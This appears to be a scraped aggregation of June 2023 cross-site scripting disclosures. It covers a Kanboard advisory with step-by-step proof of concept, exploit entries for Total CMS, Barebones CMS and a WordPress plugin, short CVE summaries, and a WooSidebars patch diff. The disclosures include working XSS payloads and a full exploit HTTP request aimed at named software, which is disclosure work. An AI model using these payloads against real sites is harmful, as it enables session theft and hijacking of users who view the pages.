Minical 1.0.0 is vulnerable to Cross Site Scripting (XSS). The vulnerability exists due to insufficient input validation in the application's user input handling in the security_helper.php file.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-33408: GitHub - Thirukrishnan/CVE-2023-33408

Kanboard is open source project management software that focuses on the Kanban methodology. A stored Cross site scripting (XSS) allows an attacker to execute arbitrary Javascript and any user who views the task containing the malicious code will be exposed to the XSS attack. Note: The default CSP header configuration blocks this javascript attack. This issue has been addressed in version 1.2.30. Users are advised to upgrade. Users unable to upgrade should ensure that they have a restrictive CSP header config.



**Summary**

A **stored XSS** allows an attacker to execute arbitrary Javascript and any user who views the task containing the malicious code will be exposed to the **XSS** attack.

**Note**: The default CSP **blocks** the javascript attack, tho it can be exploited if an instance is badly configured and at the moment it's vulnerable to **CSS injection** because of the **unsafe-inline** on the default CSP so I think that would be also good to take a look into that and maybe remove that flag from the default **CSP**.

**Details**

The stored XSS vulnerability is present in the file /app/Template/task_external_link/table.php, on **line 32**.  
The input variable $link['url'] is not properly escaped with the e function, unlike the other variables used in the same context.

<a href="<?= $link\['url'\] ?>" title="<?= $this\->text\->e($link\['url'\]) ?>"
target="\_blank"\><?= $this\->text\->e($link\['title'\]) ?><span class\="ui-helper-
hidden-accessible"\> (<?= $this\->text\->e($link\['url'\]) ?>)</span\></a\>

**PoC**

1.  Create a task in any project you wish
2.  Create a **external link** of any type ( for example, **auto** ) and then click save
3.  Change the **URL** value again, insert the following payload "><meta http-equiv="refresh" content="2;url=http://example.com/" /> and you got now a **Stored XSS** in that task.

stored\_xss\_kanboard.mp4**Impact**

The **stored XSS** allows an attacker to execute arbitrary Javascript in any user context when the malicious task is viewed by a user which also can lead to the attacker escalating his privileges within the software if a "Administrator" views the task containing the malicious code.

This would also mean massive exploitation because combined with the **Broken Access Control Vulnerability** reported before, an attacker can spray a malicious task containing the **XSS** payload into any project (personal or not) and just wait for anyone who uses the software to view it.

CVE-2023-33969: Stored XSS in the Task External Link Functionality

Total CMS version 1.7.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.totalcms.co/                                                   ││  Vendor   : Joe Workman                                                                ││  Software : Total CMS 1.7.4                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /blog/GET parameter 'search' is vulnerable to RXSShttps://website/blog/?search=yw1cz%22%3e%3cscript%3ealert(1)%3c%2fscript%3eeht7y[-] Done

Total CMS 1.7.4 Cross Site Scripting

Barebones CMS version 2.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)# Date: 2023-06-03# Exploit Author: tmrswrr# Vendor Homepage: https://barebonescms.com/# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip# Version: v2.0.2# Tested : https://demo.barebonescms.com/--- Description ---1) Login admin panel and go to new story : https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c011843235402) Click edit button and  write your payload in the title field:Payload: "><script>alert(1)</script>3) After save change and will you see alert buttonPOST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1Host: demo.barebonescms.comCookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 237Origin: https://demo.barebonescms.comDnt: 1Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeaction=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

Barebones CMS 2.0.2 Cross Site Scripting

WordPress Circle Progress plugin version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Circle progress bar – Cross sitescripting-Stored# Date: 2-06-2023# Exploit Author: Taliya Bilal- NightHawk# Vendor Homepage: https://wordpress.org/plugins/circle-progress-bar/# Version: 1.0# Tested on: Firefox# Contact me: taliyabilal765@gmail.com# Steps to reproduce:1.  Install Circle progress bar and activate plugin.2.  Navigate to Circle progress bar plugin.3.  Fill the title field with xss payload <img src=x onerror=alert(1)>4.  Click the option preview post. Here the popup will appear.#Screenshot:https://freeimage.host/i/Hrbmskvhttps://freeimage.host/i/Hrbmy4n

WordPress Circle Progress 1.0 Cross Site Scripting

Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.

CVE-2023-33733: Cure53 – Fine penetration tests for fine websites

A vulnerability, which was classified as problematic, has been found in WooSidebars Plugin up to 1.4.1 on WordPress. Affected by this issue is the function enable_custom_post_sidebars of the file classes/class-woo-sidebars.php. The manipulation of the argument sendback leads to open redirect. The attack may be launched remotely. Upgrading to version 1.4.2 is able to address this issue. The patch is identified as 1ac6d6ac26e185673f95fc1ccc56a392169ba601. It is recommended to upgrade the affected component. VDB-230654 is the identifier assigned to this vulnerability.

  

Expand Up

@@ -2,8 +2,8 @@

Contributors: woothemes, mattyza

Tags: widgets, sidebars, widget-areas

Requires at least: 3.3

Tested up to: 4.1.0

Stable tag: 1.4.1

Tested up to: 4.1.1

Stable tag: 1.4.2

License: GPLv3 or later

License URI: http://www.gnu.org/licenses/gpl-3.0.html

  

Expand Down Expand Up

@@ -71,6 +71,9 @@ Looking to contribute code to this plugin? \[Fork the repository over at GitHub\](

  

\== Upgrade Notice ==

  

\= 1.4.2 =

Security Fix for XSS vulnerability

  

\= 1.4.1 =

Fixes an error notice on the homepage, caused by the tag check logic.

  

Expand All

@@ -95,6 +98,10 @@ Moved to WordPress.org. Woo! Added scope to methods and properties where missing

  

\== Changelog ==

  

\= 1.4.2 =

\* 2015-04-22

\* Security Fix for remove\_query\_arg vulnerability

  

\= 1.4.1 =

\* 2015-02-17

Fixes an error notice on the homepage, caused by the tag check logic.

Expand Down

CVE-2015-10114: V1.4.2 - Security Fix for _query_arg vulnerability. · wp-plugins/woosidebars@1ac6d6a

Cross-site Scripting (XSS) - Stored in GitHub repository admidio/admidio prior to 4.2.8.

CVE-2023-3109

Gitpod before 2022.11.3 allows XSS because redirection can occur for some protocols outside of the trusted set of three (vscode: vscode-insiders: jetbrains-gateway:).

**Gitpod vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jun 5, 2023 to the GitHub Advisory Database • Updated Jun 6, 2023

GHSA-gqx9-h3w2-fprg: Gitpod vulnerable to Cross-site Scripting

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

gitpod-io / **gitpod** Public

*   Notifications
*   Fork 1.1k
*   Star 11k
    

*   Code
*   Issues 899
*   Pull requests 41
*   Actions
*   Projects
*   Security
*   Insights

More

1.  Releases
2.  2022.11.3

Latest

Latest

Compare

Choose a tag to compare

 corneliusludmann released this

05 Jun 12:24

· 2158 commits to main since this release

2022.11.3

9ae8bfd

Hotfix release with security fixes.

Docker image: eu.gcr.io/gitpod-core-dev/build/installer:release-2022.11.3

Assets 2

Kneba reacted with eyes emoji

1 person reacted

Tag

#xss